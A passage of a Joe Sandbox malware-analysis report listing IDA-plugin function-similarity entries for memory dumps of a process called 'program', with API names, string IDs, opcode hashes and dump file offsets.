                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6502C4E1A1F6428AFB568F31E86077963A6FF94F48F044636DE5D426A0DF3DE4888740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFBA6790000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952109608.00007FFBA6790000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F1000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA6908000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952472915.00007FFBA690A000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952519785.00007FFBA690C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6790000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007B593010$FileRead
                                                                                                                                                                                                                                  • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                  • API String ID: 1571206903-1843600136
                                                                                                                                                                                                                                  • Opcode ID: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
                                                                                                                                                                                                                                  • Instruction ID: 1d01b8f67ccd37a097044393495b2ed6de5dd601b9b3627b9a936c03cdde6447
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6141E2E2A19A4682E761CF35E8405AD7BABFB94F80F144136EE4D43694EF3CE8568340
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$connect
                                                                                                                                                                                                                                  • String ID: 3'
                                                                                                                                                                                                                                  • API String ID: 375857812-280543908
                                                                                                                                                                                                                                  • Opcode ID: ad6926efe17413235fb0923d8b5cdfad53428c2f0b392e70a2f0e2a8c3016219
                                                                                                                                                                                                                                  • Instruction ID: 78cb274ad06b232cb0ed1f23280dc2caef548b44c7b86e96941fc4c1875cc28c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad6926efe17413235fb0923d8b5cdfad53428c2f0b392e70a2f0e2a8c3016219
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94317CA5A0AB82C6F7A28F72E4C026D2398AF44B94F100575FD5D827A5DF3CE4628661
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1951835790.00007FFBA66A1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFBA66A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951780580.00007FFBA66A0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66C1000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952036399.00007FFBA66D1000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952071427.00007FFBA66D3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba66a0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Cert$Store$00007CertificateCertificatesCloseContextEnumErrorFreeLastOpen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2716309604-0
                                                                                                                                                                                                                                  • Opcode ID: 7eb488ba5e32441d0f01a54a1631f0afa1a8ca53c20eef8b2eeae5f161c725b6
                                                                                                                                                                                                                                  • Instruction ID: e8a127af4e32da94c1fa78cf7da376ec34605413058409049ec15966291698da
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7eb488ba5e32441d0f01a54a1631f0afa1a8ca53c20eef8b2eeae5f161c725b6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE8179F5E0B64286EA175F39DE141B922F3FF64F94F08A432CE0E86681DE3DA4459B00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1951835790.00007FFBA66A1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFBA66A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951780580.00007FFBA66A0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66C1000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952036399.00007FFBA66D1000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952071427.00007FFBA66D3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba66a0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CertStore$CloseOpen$Collection
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1995843185-0
                                                                                                                                                                                                                                  • Opcode ID: aaba8413391d0e4b0f15a030ceca06c547fe89b67491544b9257196f0b72f74b
                                                                                                                                                                                                                                  • Instruction ID: 768d10afa35549319cd6d5eb729286fc44c8f41dc604b7f9eba8f05243933287
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaba8413391d0e4b0f15a030ceca06c547fe89b67491544b9257196f0b72f74b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6221F2B2B09A5186FB21DF7AEC146A96762FBA4F84F449430CD0D87B14EF3CE516DA00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
• Instruction ID: c6b58e72bd74b63d40caca36ecf0d3e284f8668a89b904be69434ffa4d3f7fcd
• Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
• Instruction Fuzzy Hash: C341A462D1878283E711AB209911379B671FBA4774F609339E79C43AD5DF7CA0E08B50
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
• Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
Similarity
• API ID: ErrorLast
• String ID: ..\s\ssl\statem\statem.c$state_machine
• API String ID: 1452528299-1722249466
• Opcode ID: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
• Instruction ID: 2d0575a2c7a65f1135468b4142f2831b0b82bf9c4a4194dda9a2f618e5881feb
• Opcode Fuzzy Hash: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
• Instruction Fuzzy Hash: EBA15CE2E0E69281FB73AA35D4813BD2697EF51F44F244435DD0D466DACE3CE8E28242
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
• Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
Similarity
• API ID: ErrorLast
• String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
• API String ID: 1452528299-1219543453
• Opcode ID: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
• Instruction ID: d49346efd7d14cb61ac85dd7e9a2c148c486bb70a868fffedf26dfb544779723
• Opcode Fuzzy Hash: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
• Instruction Fuzzy Hash: 0C417DE1B0AA4182FB669B39D58477A3792EB44F94F144235DE0C47BD5DF3DE8A18300
APIs
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
• API String ID: 3251591375-0
• Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
• Instruction ID: 6e30d9ec16d69f3e57071b0ca5c78008316a9556d923d944832d7baf699061e8
• Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
• Instruction Fuzzy Hash: 66313B20E0894351FA16BB659D223B9A693FFB53E4FE45538DB0D472D7DE2CA404CA30
APIs
Memory Dump Source
• Source File: 00000008.00000002.1951835790.00007FFBA66A1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFBA66A0000, based on PE: true
• Associated: 00000008.00000002.1951780580.00007FFBA66A0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000008.00000002.1951835790.00007FFBA66C1000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000008.00000002.1951835790.00007FFBA66CA000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000008.00000002.1951835790.00007FFBA66CE000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000008.00000002.1952036399.00007FFBA66D1000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000008.00000002.1952071427.00007FFBA66D3000.00000004.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba66a0000_program.jbxd
Similarity
• API ID: CertEnhancedUsage$ErrorLast
• String ID:
• API String ID: 1886896454-0
• Opcode ID: 2cd6634cda7950ea608b26807c57f45d5ce5584d3dae50a6d6ae09d557c1b1f0
• Instruction ID: 12b182d26149dfbe27a4c00872871188d9b7e6fa92fb7092fea8c348fc06247d
• Opcode Fuzzy Hash: 2cd6634cda7950ea608b26807c57f45d5ce5584d3dae50a6d6ae09d557c1b1f0
• Instruction Fuzzy Hash: 85315EE1A0BA0282FA565F7DEC141BD62B3AFA4F91F046435CE5E82790DE3DA8559B00
APIs
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
• Instruction ID: e729ccd8e8d10f86d6f780a2c21e2924e2a28b74ba22fc5a9621f802ae7e9ed1
• Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
• Instruction Fuzzy Hash: DF51EB21B0924286E726B9659C0067AF5A2FF54BB4FA84638DE6D037C5CE3CE4018E64
APIs
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                                                                                  • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                  • Instruction ID: 2543a96461a1dba0fe938641a66756ce545f6c037bca7570d7cb3361ced89ee7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03119072608E8281DA21AB26AC14169F763FB95BF4FA44335EA7D0B7D9CE3CD0518B10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastioctlsocket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1021210092-0
                                                                                                                                                                                                                                  • Opcode ID: 9d037e66daaa798c1db8349a0f9e745af233c9881e48aae1d3b5376aec23ea56
                                                                                                                                                                                                                                  • Instruction ID: be6f112e445ad3232d08ef4a7e15cf3c3af955819ec09858131e8f6aec477969
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d037e66daaa798c1db8349a0f9e745af233c9881e48aae1d3b5376aec23ea56
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94017161A1AA41C2E7119B76E8C406E63A8FF88BD4B504070FD5E43B35CE2DD4A68710
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007E3440closesocket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 511609766-0
                                                                                                                                                                                                                                  • Opcode ID: 62ca75f0746227e7f5462e3ebb3314c23d0f25c318866796c54010b4c1d505b6
                                                                                                                                                                                                                                  • Instruction ID: 197d3d31fe7a3e9e3e8d8a2b95363af66f79ae242505ac5c7a3b4c03d74310f8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62ca75f0746227e7f5462e3ebb3314c23d0f25c318866796c54010b4c1d505b6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAF04F62A09741C2E6165F76E5C406D2328BB08BB4F1403B4EE79026E1CF3DE4668210
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00007FF72C66A9D5,?,?,00000000,00007FF72C66AA8A), ref: 00007FF72C66ABC6
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF72C66A9D5,?,?,00000000,00007FF72C66AA8A), ref: 00007FF72C66ABD0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 918212764-0
                                                                                                                                                                                                                                  • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                  • Instruction ID: ff124b5c4a0a30bc84c456b381c3c23e6591b99b348b6acf705da7a27a7e4cef
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8021C511B0864201EA5277719C9027DF6A3FFA47B0FA8423DD92E477C2CF6CE4814B20
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952893577.00007FFBAA4B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFBAA4B0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952857331.00007FFBAA4B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4D7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953017597.00007FFBAA4D8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953052763.00007FFBAA4DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa4b0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3568877910-0
                                                                                                                                                                                                                                  • Opcode ID: 8908da1cc5826f1fe7d2bd08b6d6f7bc8f78f31fa746e9609a189806a6c04201
                                                                                                                                                                                                                                  • Instruction ID: bb9e0222573c691aea1bfbbb99080d66f9a64f71fc7fbc796f1224b312d411de
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8908da1cc5826f1fe7d2bd08b6d6f7bc8f78f31fa746e9609a189806a6c04201
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61515AB2A0BA42C1EB628F35E54427962A9FF04F94F144075EE4D177A8DF3CE4928360
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
• Instruction ID: 0b099c07253b9450cd99cc86397d56a4bbef62ef019b7b493efab67f8f9d6e6f
• Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
• Instruction Fuzzy Hash: 0B41B732908242C7EA25AA15AD50179B3B2FFA57A0FA00139D68E436D1CF7DF442DF61

APIs
Memory Dump Source
• Source File: 00000008.00000002.1952893577.00007FFBAA4B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFBAA4B0000, based on PE: true
• Associated: 00000008.00000002.1952857331.00007FFBAA4B0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000008.00000002.1952893577.00007FFBAA4D7000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000008.00000002.1953017597.00007FFBAA4D8000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000008.00000002.1953052763.00007FFBAA4DA000.00000004.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa4b0000_program.jbxd
Similarity
